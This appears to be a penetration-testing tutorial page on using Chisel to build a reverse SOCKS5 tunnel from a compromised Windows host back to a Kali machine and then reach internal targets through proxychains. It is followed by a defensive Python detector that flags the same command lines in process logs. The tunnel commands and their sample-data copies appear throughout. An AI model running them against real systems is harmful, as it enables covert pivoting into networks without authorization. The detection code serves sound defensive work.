Windows: Chisel

What is Chisel?

Chisel is an awesome tool which can be used to quickly and easily set up a tunnelled proxy or port forward through a compromised system, regardless of whether you have SSH access or not. It's written in Golang and can be easily compiled for any system (with static release binaries for Linux and Windows provided). In many ways it provides the same functionality as the standard SSH proxying / port forwarding we covered earlier; however, the fact it doesn't require SSH access on the compromised target is a big bonus.

Download the latest release and gunzip it:

You must have an appropriate copy of the chisel binary on both the attacking machine and the compromised server. Copy the file to the remote server with your choice of file transfer method.

Usage

On Kali, append the following line to /etc/proxychains4.conf:

socks5 127.0.0.1 1080

On Kali, set up a Chisel server on port 8000:

chisel server --port 8000 --socks5 --reverse

Transfer chisel.exe to the compromised Windows machine. On that machine, create a SOCKS5 reverse proxy:

.\chisel.exe client --max-retry-count 1 <kali_ip>:8000 R:socks

At this stage, we can reach our target by prepending proxychains -q to every command. For instance:

proxychains -q nmap -sC -sV <target_ip>
proxychains -q ssh <username>@<target_ip>
proxychains -q mysql -u <username> -h <target_ip>
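
From the defender's side, the client and server invocations shown above leave a recognisable argument pattern in process-creation logs. The following is an added example, not code from the original page or from the Chisel project: it flags that pattern in constructed log records regardless of the binary's file name, and generalises from the page's R:socks to other R: remote specifications. The sample records and the names classify and scan are assumptions.

```python
import re

# Constructed process-creation records (image path, command line), e.g. as
# exported from Sysmon Event ID 1 or auditd. All hosts and paths are made up.
SAMPLE_EVENTS = [
    (r"C:\Users\Public\chisel.exe",
     r".\chisel.exe client --max-retry-count 1 10.0.0.5:8000 R:socks"),
    (r"C:\Windows\Temp\svc-update.exe",          # renamed binary, same arguments
     r"svc-update.exe client 10.0.0.5:8000 R:socks"),
    ("/usr/local/bin/chisel", "chisel server --port 8000 --socks5 --reverse"),
    (r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe -R 1080 user@10.0.0.5"),
    (r"C:\Program Files\App\sync.exe",
     "sync.exe client --server files.example.internal:443"),
]

# "R:" remote spec: R:socks as on the page, or R:<port>:<host>:<port> forwards.
REVERSE_REMOTE = re.compile(r"^R:[\w.\-:/]+$")
# Server argument: optional scheme, host, port.
SERVER_ADDR = re.compile(r"^(https?://)?[\w.\-]+:\d{1,5}$")


def classify(cmdline):
    """Return 'reverse-client', 'reverse-server' or None for one command line."""
    args = cmdline.split()[1:]  # ignore argv[0]: the file name is trivially changed
    if not args:
        return None
    sub, rest = args[0].lower(), args[1:]
    if sub == "client":
        has_server = any(SERVER_ADDR.match(a) for a in rest)
        has_reverse = any(REVERSE_REMOTE.match(a) for a in rest)
        return "reverse-client" if has_server and has_reverse else None
    if sub == "server":
        flags = {a.lower() for a in rest}
        return "reverse-server" if {"--reverse", "--socks5"} <= flags else None
    return None


def scan(events):
    """Return (image, verdict) for every record that matches a tunnel pattern."""
    hits = []
    for image, cmdline in events:
        verdict = classify(cmdline)
        if verdict:
            hits.append((image, verdict))
    return hits


if __name__ == "__main__":
    for image, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:15} {image}")
```

Matching on argument shape rather than image name is what lets the renamed copy in the sample data be caught; pair it with network telemetry for the outbound connection to the server port to reduce false positives.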
